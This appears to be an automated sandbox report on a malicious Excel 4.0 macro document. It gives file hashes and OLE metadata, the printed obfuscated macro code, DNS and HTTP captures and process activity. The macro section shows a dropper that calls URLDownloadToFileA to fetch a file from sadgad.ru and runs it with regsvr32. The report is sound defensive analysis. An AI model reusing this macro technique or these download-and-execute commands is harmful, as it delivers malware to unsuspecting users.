      Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

      Static File Info

      General

      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:42:41 2020, Security: 0
      Entropy (8bit):7.522924015157244
      TrID:
      • Microsoft Excel sheet (30009/1) 78.94%
      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
      File name:document-1458063504.xls
      File size:338944
      MD5:81094e0ac247fac6db3dea774c51d885
      SHA1:7fea7786c0b5ae000d81eb03fa1ca1587a9b878d
      SHA256:dfbac751a1f71e4e4c92e9c88fdfd531ce6eec06e078046cf025cd0f049487bd
      SHA512:165106cd12002f5bc03c620015f23b66ba111265e8dc7bae3f53bbe32cb18aa076a5d0fd9b9042c6398e42c6dcd466d6714b42dc71929e002a96dd4df7b5cbd5
      SSDEEP:6144:QcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTq:iizo8RnsIROnr6n75Yx
      File Content Preview:........................>......................................................................................................................................................................................................................................

      File Icon

      Icon Hash:e4eea286a4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "document-1458063504.xls"

      Indicators

      Has Summary Info:True
      Application Name:Microsoft Excel
      Encrypted Document:False
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:True

      Summary

      Code Page:1251
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2020-11-26 09:42:41
      Creating Application:Microsoft Excel
      Security:0

      Document Summary

      Document Code Page:1251
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:917504

      Streams

      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
      General
      Stream Path:\x5DocumentSummaryInformation
      File Type:data
      Stream Size:4096
      Entropy:0.367004077607
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
      General
      Stream Path:\x5SummaryInformation
      File Type:data
      Stream Size:4096
      Entropy:0.257530318219
      Base64 Encoded:False
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 326231
      General
      Stream Path:Workbook
      File Type:Applesoft BASIC program data, first line number 16
      Stream Size:326231
      Entropy:7.65642875426
      Base64 Encoded:True
      Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
      Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

      Macro 4.0 Code

      CALL("Ke"&????2!GR380&"32", "Cr"&????2!GT408&"yA", "JCJ", ????2!GI378&????2!GI393, 0)
      
      CALL("U"&????2!GT398, "U"&????4!E65, "IICCII", 0, ????2!HF354, ????2!GI378&????2!GI393&????2!GI407, 0, 0)
      
      =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!GR380&""32"",""Cr""&????2!GT408&""yA"",""JCJ"",????2!GI378&????2!GI393,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      "=CALL(""Ke""&????2!GR380&""32"",""Cr""&????2!GT408&""yA"",""JCJ"",????2!GI378,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
      "=CALL(""U""&????2!GT398,""U""&????4!E65,""IICCII"",0,????2!HF354,????2!GI378&????2!GI393&????2!GI407,0,0)"=EXEC(????3!W36&????2!GI378&????2!GI393&????2!GI407)=HALT()

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 29, 2020 05:59:58.700850010 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 05:59:58.754725933 CET804916578.110.50.130192.168.2.22
      Nov 29, 2020 05:59:58.754843950 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 05:59:58.755995035 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 05:59:58.809814930 CET804916578.110.50.130192.168.2.22
      Nov 29, 2020 05:59:59.834609985 CET804916578.110.50.130192.168.2.22
      Nov 29, 2020 05:59:59.834924936 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 06:00:00.033905029 CET804916578.110.50.130192.168.2.22
      Nov 29, 2020 06:00:00.034035921 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 06:01:58.566704988 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 06:01:58.877674103 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 06:01:59.486015081 CET4916580192.168.2.2278.110.50.130
      Nov 29, 2020 06:02:00.702946901 CET4916580192.168.2.2278.110.50.130

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Nov 29, 2020 05:59:58.597210884 CET5219753192.168.2.228.8.8.8
      Nov 29, 2020 05:59:58.678988934 CET53521978.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Nov 29, 2020 05:59:58.597210884 CET192.168.2.228.8.8.80x26d4Standard query (0)sadgad.ruA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Nov 29, 2020 05:59:58.678988934 CET8.8.8.8192.168.2.220x26d4No error (0)sadgad.ru78.110.50.130A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • sadgad.ru

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.224916578.110.50.13080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Nov 29, 2020 05:59:58.755995035 CET0OUTGET /ds/231120.gif HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: sadgad.ru
      Connection: Keep-Alive
      Nov 29, 2020 05:59:59.834609985 CET1INHTTP/1.1 200 OK
      Date: Sun, 29 Nov 2020 04:59:58 GMT
      Server: Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.6.25
      X-Powered-By: PHP/5.6.25
      Content-Length: 0
      Content-Type: image/gif
      X-Cache: MISS from hc2.hts.ru
      X-Cache-Lookup: MISS from hc2.hts.ru:80


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Start time:05:59:38
      Start date:29/11/2020
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f960000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:05:59:43
      Start date:29/11/2020
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
      Imagebase:0xff880000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Disassembly

      Code Analysis

      Reset < >